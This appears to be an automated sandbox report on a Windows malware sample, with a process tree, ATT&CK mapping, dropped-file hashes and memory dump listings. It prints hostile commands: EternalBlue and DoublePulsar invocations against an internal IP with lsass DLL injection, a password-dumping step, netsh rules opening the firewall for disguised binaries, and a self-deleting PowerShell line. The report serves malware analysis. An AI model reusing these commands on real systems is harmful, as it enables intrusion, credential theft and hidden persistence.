PID 1616 wrote to memory of 1388	1616	rundll32.exe	30
PID 1616 wrote to memory of 1388	1616	rundll32.exe	30
PID 1388 wrote to memory of 1732	1388	rundll32.exe	31
PID 1388 wrote to memory of 1732	1388	rundll32.exe	31
PID 1388 wrote to memory of 1732	1388	rundll32.exe	31
PID 1388 wrote to memory of 1732	1388	rundll32.exe	31
PID 1388 wrote to memory of 1732	1388	rundll32.exe	31
PID 1388 wrote to memory of 1732	1388	rundll32.exe	31
PID 1388 wrote to memory of 1732	1388	rundll32.exe	31
PID 1388 wrote to memory of 1732	1388	rundll32.exe	31
PID 1388 wrote to memory of 1732	1388	rundll32.exe	31
PID 1732 wrote to memory of 2740	1732	svchost.exe	34
PID 1732 wrote to memory of 2740	1732	svchost.exe	34
PID 1732 wrote to memory of 2740	1732	svchost.exe	34
PID 1732 wrote to memory of 2740	1732	svchost.exe	34
PID 2740 wrote to memory of 18704	2740	MpMgSvc.exe	35
PID 2740 wrote to memory of 18704	2740	MpMgSvc.exe	35
PID 2740 wrote to memory of 18704	2740	MpMgSvc.exe	35
PID 2740 wrote to memory of 18704	2740	MpMgSvc.exe	35
PID 2740 wrote to memory of 18244	2740	MpMgSvc.exe	37
PID 2740 wrote to memory of 18244	2740	MpMgSvc.exe	37
PID 2740 wrote to memory of 18244	2740	MpMgSvc.exe	37
PID 2740 wrote to memory of 18244	2740	MpMgSvc.exe	37
PID 2740 wrote to memory of 868	2740	MpMgSvc.exe	39
PID 2740 wrote to memory of 868	2740	MpMgSvc.exe	39
PID 2740 wrote to memory of 868	2740	MpMgSvc.exe	39
PID 2740 wrote to memory of 868	2740	MpMgSvc.exe	39
PID 868 wrote to memory of 3216	868	Wmicc.exe	40
PID 868 wrote to memory of 3216	868	Wmicc.exe	40
PID 868 wrote to memory of 3216	868	Wmicc.exe	40
PID 868 wrote to memory of 3216	868	Wmicc.exe	40
PID 3216 wrote to memory of 2940	3216	cmd.exe	42
PID 3216 wrote to memory of 2940	3216	cmd.exe	42
PID 3216 wrote to memory of 2940	3216	cmd.exe	42
PID 3216 wrote to memory of 2940	3216	cmd.exe	42
PID 1732 wrote to memory of 5284	1732	svchost.exe	43
PID 1732 wrote to memory of 5284	1732	svchost.exe	43
PID 1732 wrote to memory of 5284	1732	svchost.exe	43
PID 1732 wrote to memory of 5284	1732	svchost.exe	43
PID 5284 wrote to memory of 19288	5284	Hooks.exe	44
PID 5284 wrote to memory of 19288	5284	Hooks.exe	44
PID 5284 wrote to memory of 19288	5284	Hooks.exe	44
PID 5284 wrote to memory of 19288	5284	Hooks.exe	44
PID 5284 wrote to memory of 19140	5284	Hooks.exe	46
PID 5284 wrote to memory of 19140	5284	Hooks.exe	46
PID 5284 wrote to memory of 19140	5284	Hooks.exe	46
PID 5284 wrote to memory of 19140	5284	Hooks.exe	46
PID 5284 wrote to memory of 19060	5284	Hooks.exe	48
PID 5284 wrote to memory of 19060	5284	Hooks.exe	48
PID 5284 wrote to memory of 19060	5284	Hooks.exe	48
PID 5284 wrote to memory of 19060	5284	Hooks.exe	48
PID 5284 wrote to memory of 18852	5284	Hooks.exe	50
PID 5284 wrote to memory of 18852	5284	Hooks.exe	50
PID 5284 wrote to memory of 18852	5284	Hooks.exe	50
PID 5284 wrote to memory of 18852	5284	Hooks.exe	50
PID 5284 wrote to memory of 18448	5284	Hooks.exe	52
PID 5284 wrote to memory of 18448	5284	Hooks.exe	52
PID 5284 wrote to memory of 18448	5284	Hooks.exe	52
PID 5284 wrote to memory of 18448	5284	Hooks.exe	52

C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\97da3b940784391248a269926d7a1fc1115f403133f77de2750623e6f7bfc330.dll,#1
1⤵
- Suspicious use of WriteProcessMemory
PID:1616
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe C:\Users\Admin\AppData\Local\Temp\97da3b940784391248a269926d7a1fc1115f403133f77de2750623e6f7bfc330.dll,#1
  2⤵
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1388
- - C:\Windows\SysWOW64\svchost.exe
    "C:\Windows\system32\svchost.exe"
    3⤵
    - Downloads MZ/PE file
    - Loads dropped DLL
    - Unexpected DNS network traffic destination
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1732
  - - C:\WINDOWS\Temp\MpMgSvc.exe
      "C:\WINDOWS\Temp\MpMgSvc.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:2740
    - - C:\WINDOWS\Temp\Eternalblue-2.2.0.exe
        
        Eternalblue-2.2.0.exe --TargetIp 10.127.1.130 --Target WIN72K8R2 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig LOG.txt
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:18704
    - - C:\WINDOWS\Temp\Eternalblue-2.2.0.exe
        
        Eternalblue-2.2.0.exe --TargetIp 10.127.1.130 --Target WIN72K8R2 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig LOG.txt
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:18244
    - - C:\Windows\Temp\Wmicc.exe
        
        "C:\Windows\Temp\Wmicc.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:868
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c C:\Windows\Temp\GetPassword.exe >C:\Windows\Temp\PWD.txt
        6⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3216
        
        C:\Windows\Temp\GetPassword.exe
        
        C:\Windows\Temp\GetPassword.exe
        7⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2940
    - - C:\WINDOWS\Temp\Doublepulsar-1.3.1.exe
        
        Doublepulsar-1.3.1.exe --OutConfig LOG.txt --TargetIp 10.127.1.130 --TargetPort 445 --DllPayload x64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:15740
    - - C:\WINDOWS\Temp\Doublepulsar-1.3.1.exe
        
        Doublepulsar-1.3.1.exe --OutConfig LOG.txt --TargetIp 10.127.1.130 --TargetPort 445 --DllPayload x64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:1224
  - - C:\WINDOWS\Temp\Hooks.exe
      "C:\WINDOWS\Temp\Hooks.exe"
      4⤵
      Server Software Component: Terminal Services DLL
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:5284
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name=Microsoft_ctfmoon dir=in program=C:\Windows\Microsoft.NET\ctfmoon.exe action=allow
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:19288
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name=Microsoft_ctfmoon dir=out program=C:\Windows\Microsoft.NET\ctfmoon.exe action=allow
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:19140
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall set rule name=Microsoft_ctfmoon new enable=yes
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:19060
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name=Microsoft_Dcom dir=in program=C:\Windows\Microsoft.NET\traffmonetizer\traffmonetizer.exe action=allow
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:18852
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name=Microsoft_Dcom dir=out program=C:\Windows\Microsoft.NET\traffmonetizer\traffmonetizer.exe action=allow
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:18448
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall set rule name=Microsoft_Dcom new enable=yes
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:18060
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name=Microsoft_Store dir=in program=C:\WINDOWS\Microsoft.Net\Framework\v3.0\WmiPrvSER.exe action=allow
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:17760
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name=Microsoft_Store dir=out program=C:\WINDOWS\Microsoft.Net\Framework\v3.0\WmiPrvSER.exe action=allow
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:17448
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall set rule name=Microsoft_Store new enable=yes
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:17180
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Sleep -s 2;del "C:\WINDOWS\Temp\Hooks.exe"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:16736

C:\Windows\SysWOW64\svchost.exe
C:\Windows\SysWOW64\svchost.exe -k GraphicsPerfSvcsGroup
1⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:16756
- C:\Windows\SysWOW64\svchost.exe
  "C:\Windows\system32\svchost.exe"
  2⤵
  - Unexpected DNS network traffic destination
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: GetForegroundWindowSpam
  PID:16608
- C:\Windows\Microsoft.NET\ctfmoon.exe
  C:\Windows\Microsoft.NET\ctfmoon.exe [email protected] -password=123456Aa. -device-name=Win32 -accept-tos
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:16064
- C:\Windows\Microsoft.NET\traffmonetizer\traffmonetizer.exe
  C:\Windows\Microsoft.NET\traffmonetizer\traffmonetizer.exe
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:12148
- - C:\Windows\Microsoft.NET\traffmonetizer\traffmonetizer.exe
    "C:\Windows\Microsoft.NET\traffmonetizer\traffmonetizer.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    PID:10352
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 12148 -s 1752
    3⤵
    PID:10292

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Server Software Component

T1505

Terminal Services DLL

T1505.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Credential Access

Discovery

Network Service Discovery

T1046

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\WINDOWS\Temp\trfo-2.dll

Filesize
29KB

MD5
3e89c56056e5525bf4d9e52b28fbbca7

SHA1
08f93ab25190a44c4e29bee5e8aacecc90dab80c

SHA256
b2a3172a1d676f00a62df376d8da805714553bb3221a8426f9823a8a5887daaa

SHA512
32487c6bca48a989d48fa7b362381fadd0209fdcc8e837f2008f16c4b52ab4830942b2e0aa1fb18dbec7fce189bb9a6d40f362a6c2b4f44649bd98557ecddbb6

Download Submit
C:\Windows\Microsoft.NET\traffmonetizer\Base.dll

Filesize
106KB

MD5
c3935313bbf380cd8d3cb336a5e3c8e8

SHA1
c09f0b894ee5a6a59dea194e94b42fff29b53f38

SHA256
4d0409c6db0b0af97f5fc57ebe2248c1632aeb836a5ea1eeaad64f57a4eb662b

SHA512
6525f98811cb277fbae75e278fca7997c6a6993b3f3f163a3c98da85055305d7a61917981625f113c448b8a397d3c5a143db2c8b131e5e4395205e34dc7c48a2

Download Submit
C:\Windows\Microsoft.NET\traffmonetizer\System.Buffers.dll

Filesize
20KB

MD5
ecdfe8ede869d2ccc6bf99981ea96400

SHA1
2f410a0396bc148ed533ad49b6415fb58dd4d641

SHA256
accccfbe45d9f08ffeed9916e37b33e98c65be012cfff6e7fa7b67210ce1fefb

SHA512
5fc7fee5c25cb2eee19737068968e00a00961c257271b420f594e5a0da0559502d04ee6ba2d8d2aad77f3769622f6743a5ee8dae23f8f993f33fb09ed8db2741

Download Submit
C:\Windows\Microsoft.NET\traffmonetizer\System.Memory.dll

Filesize
137KB

MD5
6fb95a357a3f7e88ade5c1629e2801f8

SHA1
19bf79600b716523b5317b9a7b68760ae5d55741

SHA256
8e76318e8b06692abf7dab1169d27d15557f7f0a34d36af6463eff0fe21213c7

SHA512
293d8c709bc68d2c980a0df423741ce06d05ff757077e63986d34cb6459f9623a024d12ef35a280f50d3d516d98abe193213b9ca71bfde2a9fe8753b1a6de2f0

Download Submit
C:\Windows\Microsoft.NET\traffmonetizer\System.Runtime.CompilerServices.Unsafe.dll

Filesize
16KB

MD5
9a341540899dcc5630886f2d921be78f

SHA1
bab44612721c3dc91ac3d9dfca7c961a3a511508

SHA256
3cadcb6b8a7335141c7c357a1d77af1ff49b59b872df494f5025580191d1c0d5

SHA512
066984c83de975df03eee1c2b5150c6b9b2e852d9caf90cfd956e9f0f7bd5a956b96ea961b26f7cd14c089bc8a27f868b225167020c5eb6318f66e58113efa37

Download Submit
C:\Windows\Microsoft.NET\traffmonetizer\System.Text.Encodings.Web.dll

Filesize
66KB

MD5
e8cdacfd2ef2f4b3d1a8e6d59b6e3027

SHA1
9a85d938d8430a73255a65ea002a7709c81a4cf3

SHA256
edf13ebf2d45152e26a16b947cd953aeb7a42602fa48e53fd7673934e5acea30

SHA512
ee1005270305b614236d68e427263b4b4528ad3842057670fad061867286815577ec7d3ed8176e6683d723f9f592abcbf28d24935ce8a34571ab7f1720e2ffc5

Download Submit
C:\Windows\Microsoft.NET\traffmonetizer\System.Text.Json.dll

Filesize
347KB

MD5
38470ca21414a8827c24d8fe0438e84b

SHA1
1c394a150c5693c69f85403f201caa501594b7ab

SHA256
2c7435257690ac95dc03b45a236005124097f08519adf3134b1d1ece4190e64c

SHA512
079f7320cc2f3b97a5733725d3b13dff17b595465159daabca5a166d39777100e5a2d9af2a75989dfabdb2f29eac0710e16c3bb2660621344b7a63c5dbb87ef8

Download Submit
C:\Windows\Microsoft.NET\traffmonetizer\System.ValueTuple.dll

Filesize
77KB

MD5
8c9424e37a28db7d70e7d52f0df33cf8

SHA1
81cd1acb53d493c54c8d56f379d790a901a355ac

SHA256
e4774aead2793f440e0ced6c097048423d118e0b6ed238c6fe5b456acb07817f

SHA512
cb6364c136f9d07191cf89ea2d3b89e08db0cd5911bf835c32ae81e4d51e0789ddc92d47e80b7ff7e24985890ed29a00b0a391834b43cf11db303cd980d834f4

Download Submit
C:\Windows\Microsoft.NET\traffmonetizer\traffmonetizer.exe.config

Filesize
18KB

MD5
e3f86e44d1997122912dd19c93b4cc51

SHA1
55a2abf767061a27d48fc5eda94ba8156add3e81

SHA256
8905f68562e02ca9c686f8bb6edde6643c94b2592240c6ed0d40ca380e69e62d

SHA512
314f97d7889d22d1086682c2abfcf0bcb753c2103a29127407392fa05dabb69f1528c7b8028aeac48e5fd7daf0fb1e4a367e6d83f7ca73bcea8e7c6e1d1b54d5

Download Submit
C:\Windows\Temp\Eternalblue-2.2.0.xml

Filesize
7KB

MD5
497080fed2000e8b49ee2e97e54036b1

SHA1
4af3fae881a80355dd09df6e736203c30c4faac5

SHA256
756f44f1d667132b043bfd3da16b91c9f6681e5d778c5f07bb031d62ff00d380

SHA512
4f8bd09f9d8d332c436beb8164eec90b0e260b69230f102565298beff0db37265be1ae5eb70acf60e77d5589c61c7ee7f01a02d2a30ac72d794a04efef6f25df

Download Submit
C:\Windows\Temp\GetPassword.exe

Filesize
494KB

MD5
5b6a804db0c5733d331eb126048ca73b

SHA1
f18c5acae63457ad26565d663467fa5a7fbfbee4

SHA256
5bec6b3bc6f8cbda50a8c5195a488cc82d2e00f18ec75640db31b2376a6db9f9

SHA512
ba6424051ab9f650967cc2ba428fd6a02ccda8f99d8b8e3f5f321a5e6bbf79a22bfc9cdd582c44980470ebbb7aea1b811fd69aab6bf51466a803c7c722fcde26

Download Submit
C:\Windows\Temp\Hooks.exe

Filesize
6.8MB

MD5
bac8175b9fce575ef751012c729a1d32

SHA1
0ff584ee230838ae8fefffb16009104393ec515c

SHA256
a35b7570b7818fb47837073b594b4581049edaa087a9e854b5b395abdc7b6773

SHA512
608c5bebfa6f0d99bad5a79af48fabdcc5092c27cd631dda31f3dd27fbd1bf5654244cb89014718437a290177f1d47010ddbb85c3737bec3afc11b9173d54663

Download Submit
C:\Windows\Temp\MpMgSvc.exe

Filesize
3.2MB

MD5
3809c59565787ee7398fe9222d4bd669

SHA1
68842768c9ae9deb1d1d7ed2b27846c392b47103

SHA256
c751d97251cd67604c0256b779fabac87d4ed2d647ce0d830e2a1670cd3616c6

SHA512
2f78ad26acfe15f4682b69090704fa8ebb24938c8a58b8d343ef0993e8234897aed53dfcea4119168f915384fe545d2cbb16bc12339d0600dafae06deefc9098

Download Submit
C:\Windows\Temp\PWD.txt

Filesize
29B

MD5
6996d5865b16b70ce3f19f665ef3f4c9

SHA1
8db328f4827678f01086d2015d798e3d91a64df3

SHA256
0a21a1b50ba3d57fd42afdf2fa6b743c4ae90882a415f2ecdc871239ed889b0b

SHA512
911b577cb1883e756bc106a1a5bba0d439df2dce3633c513f3322b3f0b0d9e9292bc7258578baf544fb6d1ddf5efb43fa26fb48ff07af69a4aab64e496469714

Download Submit
C:\Windows\Temp\ip.txt

Filesize
180KB

MD5
8f4b70050393036135929d5e07b03a93

SHA1
333995f2c44e870b9bec53394a7524e2a65f3e01

SHA256
874bfe1b4a1e66becd4e1c761dc06f73985eabd84c77f8a5a503f27f4d3b0601

SHA512
af50bc5baca95d5b2af1eab6d9b38ccc24aef4663df1d1ef4c8deaf47ba5adf6f148053e14b4e0c43cbd9d1fdcfabf2a6486e01a7c63df1417117b63c41618a0

Download Submit
C:\Windows\Temp\ip.txt

Filesize
2KB

MD5
3fe271beeb27c0fd72f4139b54f36aeb

SHA1
06c535e1de5833ef7efc40b90cfac1c310a11aa9

SHA256
b6f69fb7f587accd2f3e35c559b02e277b9429a146546b4fcb3a0215bd0a4674

SHA512
9a64f7e5152ce783278fc158bf375040dbe4a121925acf24a7ee6e5d2fa4677be0c5e0ebd6d71823074a8aeb523bb8b9e180b853db1c355d730ac8856e845c69

Download Submit
C:\Windows\Temp\ip.txt

Filesize
3KB

MD5
422a5056861963cf17b059d5486b190a

SHA1
35d432622a1ef9bfcaae1f7645b94c92170687d5

SHA256
8b21079f6bc3f71f06ba138d18f777869b60dac0bc27a73aeb61d0bf0c0a58dd

SHA512
86562c9362eac65423d92281957fb131297cca9e1aa71ce0961cbacd1dbf8a1aa63cc370bff1a2a0a1122f66d462e03de8056536bf18515b6c2aa8246cea518d

Download Submit
C:\Windows\Temp\ip.txt

Filesize
5KB

MD5
89580751f6d017d5e36d593c37c4ee0a

SHA1
f2b01e2d63dda08e932170833e3f0594343c144d

SHA256
c70706821d8bc3758ae02c5bd7818653a53a16b204acbe418ebe67678bcbdc47

SHA512
275d452dbe70b202a8310b4c9e2de243a15d60fc21b058a90701f7e8d82b0fa31d2fb8a6a1018dc4b08a753f3205914275b8818c3a5d1223e910f1261a44ba8c

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Roaming\traffmonetizer\settings.json

Filesize
98B

MD5
2e839b7ab87694f72220658502588c41

SHA1
b3996f638b1e00b4bdf5cadeab99d05492313f37

SHA256
376a0ca610d4de58de3887a8700d3e0f64fdc2123846a4f88876751847aef519

SHA512
050fe964fbdfd1a957ef3e8a1c1ce6ada6d5473be890ea318a9720a7c8e42e9fb8afcc723a03ed9deeb3f2ccbff0fe725eb0b831a24e9e4df39b7249da5688a1

Download Submit
\??\c:\users\admin\appdata\roaming\graphicsperfsvcs.dll

Filesize
14.7MB

MD5
a83318068ed77eef71f9d28e4731c179

SHA1
347f97b17ccb4f22a4e201009b6145066b600e1d

SHA256
89cd66e51f490dba5a818525bab15810604b895cebb2a5bfb4fb670ca229f972

SHA512
e790bd6cde5fc3440560d5267f3a50f3ac04ccb123d3b52608579e76877477aa630d94683e84a6cf69ea6cfc862569cc923d216185f19a934797c81eea712fbe

Download Submit
\Windows\Microsoft.NET\ctfmoon.exe

Filesize
9.1MB

MD5
1de26ef85f7218e1df4ed675fa2b05d4

SHA1
e5217fa3b50f625d84d5e5c4b66c031f7a2446ae

SHA256
fdd762192d351cea051c0170840f1d8d171f334f06313a17eba97cacb5f1e6e1

SHA512
ada80a9f97bec76899eccc40c646387a067a201663d4d0f4537af450ea7c92df877f017862634e32e9e2ba08ca6d41806dc03f0dfd7f811ca303b56b1ac17d92

Download Submit
\Windows\Microsoft.NET\traffmonetizer\Traffmonetizer.exe

Filesize
680KB

MD5
2884fdeaa62f29861ce2645dde0040f6

SHA1
01a775a431f6e4da49f5c5da2dab74cc4d770021

SHA256
2923eacd0c99a2d385f7c989882b7cca83bff133ecf176fdb411f8d17e7ef265

SHA512
470ce2cf25d7ee66f4ceb197e218872ea1b865de7029fadb0d41f3324a213b94c668968f20e228e87a879c1f0c13c9827f3b8881820d02e780d567d791ad159f

Download Submit
\Windows\Temp\Eternalblue-2.2.0.exe

Filesize
126KB

MD5
8c80dd97c37525927c1e549cb59bcbf3

SHA1
4e80fa7d98c8e87facecdef0fc7de0d957d809e1

SHA256
85b936960fbe5100c170b777e1647ce9f0f01e3ab9742dfc23f37cb0825b30b5

SHA512
50e9a3b950bbd56ff9654f9c2758721b181e7891384fb37e4836cf78422399a07e6b0bfab16350e35eb2a13c4d07b5ce8d4192fd864fb9aaa9602c7978d2d35e

Download Submit
\Windows\Temp\Wmicc.exe

Filesize
1.4MB

MD5
4935b75f2a23d38527cf3821c9d9dac3

SHA1
f17aa56215ab7b90da00f048fe30d39a2d671b5d

SHA256
dd2d7b07e9091590ae60b42022956319bbbbd51b457ea214fb475ecc3e9156f8

SHA512
348e041104de20b0850b19db1ebb88ae0b65ecd1695f1ade47e099d62da9cec983a1a73e7fc657509b4fc58496784e0c1681bf46265477b75fdfab440c41acbd

Download Submit
\Windows\Temp\coli-0.dll

Filesize
15KB

MD5
3c2fe2dbdf09cfa869344fdb53307cb2

SHA1
b67a8475e6076a24066b7cb6b36d307244bb741f

SHA256
0439628816cabe113315751e7113a9e9f720d7e499ffdd78acbac1ed8ba35887

SHA512
d6b819643108446b1739cbcb8d5c87e05875d7c1989d03975575c7d808f715ddcce94480860828210970cec8b775c14ee955f99bd6e16f9a32b1d5dafd82dc8c

Download Submit
\Windows\Temp\exma-1.dll

Filesize
10KB

MD5
ba629216db6cf7c0c720054b0c9a13f3

SHA1
37bb800b2bb812d4430e2510f14b5b717099abaa

SHA256
15292172a83f2e7f07114693ab92753ed32311dfba7d54fe36cc7229136874d9

SHA512
c4f116701798f210d347726680419fd85880a8dc12bf78075be6b655f056a17e0a940b28bbc9a5a78fac99e3bb99003240948ed878d75b848854d1f9e5768ec9

Download Submit
\Windows\Temp\libxml2.dll

Filesize
807KB

MD5
9a5cec05e9c158cbc51cdc972693363d

SHA1
ca4d1bb44c64a85871944f3913ca6ccddfa2dc04

SHA256
aceb27720115a63b9d47e737fd878a61c52435ea4ec86ba8e58ee744bc85c4f3

SHA512
8af997c3095d728fe95eeedfec23b5d4a9f2ea0a8945f8c136cda3128c17acb0a6e45345637cf1d7a5836aaa83641016c50dbb59461a5a3fb7b302c2c60dfc94

Download Submit
\Windows\Temp\posh-0.dll

Filesize
11KB

MD5
2f0a52ce4f445c6e656ecebbcaceade5

SHA1
35493e06b0b2cdab2211c0fc02286f45d5e2606d

SHA256
cde45f7ff05f52b7215e4b0ea1f2f42ad9b42031e16a3be9772aa09e014bacdb

SHA512
88151ce5c89c96c4bb086d188f044fa2d66d64d0811e622f35dceaadfa2c7c7c084dd8afb5f774e8ad93ca2475cc3cba60ba36818b5cfb4a472fc9ceef1b9da1

Download Submit
\Windows\Temp\tibe-2.dll

Filesize
232KB

MD5
f0881d5a7f75389deba3eff3f4df09ac

SHA1
8404f2776fa8f7f8eaffb7a1859c19b0817b147a

SHA256
ca63dbb99d9da431bf23aca80dc787df67bb01104fb9358a7813ed2fce479362

SHA512
f266baecae0840c365fe537289a8bf05323d048ef3451ebffbe75129719c1856022b4bddd225b85b6661bbe4b2c7ac336aa9efdeb26a91a0be08c66a9e3fe97e

Download Submit
\Windows\Temp\trch-1.dll

Filesize
58KB

MD5
838ceb02081ac27de43da56bec20fc76

SHA1
972ab587cdb63c8263eb977f10977fd7d27ecf7b

SHA256
0259d41720f7084716a3b2bbe34ac6d3021224420f81a4e839b0b3401e5ef29f

SHA512
bcca9e1e2f84929bf513f26cc2a7dc91f066e775ef1d34b0fb00a54c8521de55ef8c81f796c7970d5237cdeab4572dedfd2b138d21183cb19d2225bdb0362a22

Download Submit
\Windows\Temp\tucl-1.dll

Filesize
9KB

MD5
83076104ae977d850d1e015704e5730a

SHA1
776e7079734bc4817e3af0049f42524404a55310

SHA256
cf25bdc6711a72713d80a4a860df724a79042be210930dcbfc522da72b39bb12

SHA512
bd1e6c99308c128a07fbb0c05e3a09dbcf4cec91326148439210077d09992ebf25403f6656a49d79ad2151c2e61e6532108fed12727c41103df3d7a2b1ba82f8

Download Submit
\Windows\Temp\ucl.dll

Filesize
57KB

MD5
6b7276e4aa7a1e50735d2f6923b40de4

SHA1
db8603ac6cac7eb3690f67af7b8d081aa9ce3075

SHA256
f0df80978b3a563077def7ba919e2f49e5883d24176e6b3371a8eef1efe2b06a

SHA512
58e65ce3a5bcb65f056856cfda06462d3fbce4d625a76526107977fd7a44d93cfc16de5f9952b8fcff7049a7556b0d35de0aa02de736f0daeec1e41d02a20daa

Download Submit
memory/1224-13810-0x0000000000AC0000-0x0000000000AF0000-memory.dmp

Filesize
192KB

Download
memory/1224-13811-0x0000000000DD0000-0x0000000000EB3000-memory.dmp

Filesize
908KB

Download
memory/1224-13807-0x0000000000D00000-0x0000000000DCE000-memory.dmp

Filesize
824KB

Download
memory/1732-2-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/1732-8-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/1732-9-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/1732-13621-0x0000000003420000-0x000000000431E000-memory.dmp

Filesize
15.0MB

Download
memory/1732-13622-0x0000000003420000-0x000000000431E000-memory.dmp

Filesize
15.0MB

Download
memory/1732-13626-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/1732-10-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/1732-6-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/1732-20-0x0000000003420000-0x0000000003D45000-memory.dmp

Filesize
9.1MB

Download
memory/1732-3-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/1732-22-0x0000000003420000-0x0000000003D45000-memory.dmp

Filesize
9.1MB

Download
memory/1732-1-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/1732-0-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/1732-11-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/1732-4-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/2740-13597-0x0000000000400000-0x0000000000D25000-memory.dmp

Filesize
9.1MB

Download
memory/2740-13768-0x0000000000400000-0x0000000000D25000-memory.dmp

Filesize
9.1MB

Download
memory/2740-13794-0x0000000000400000-0x0000000000D25000-memory.dmp

Filesize
9.1MB

Download
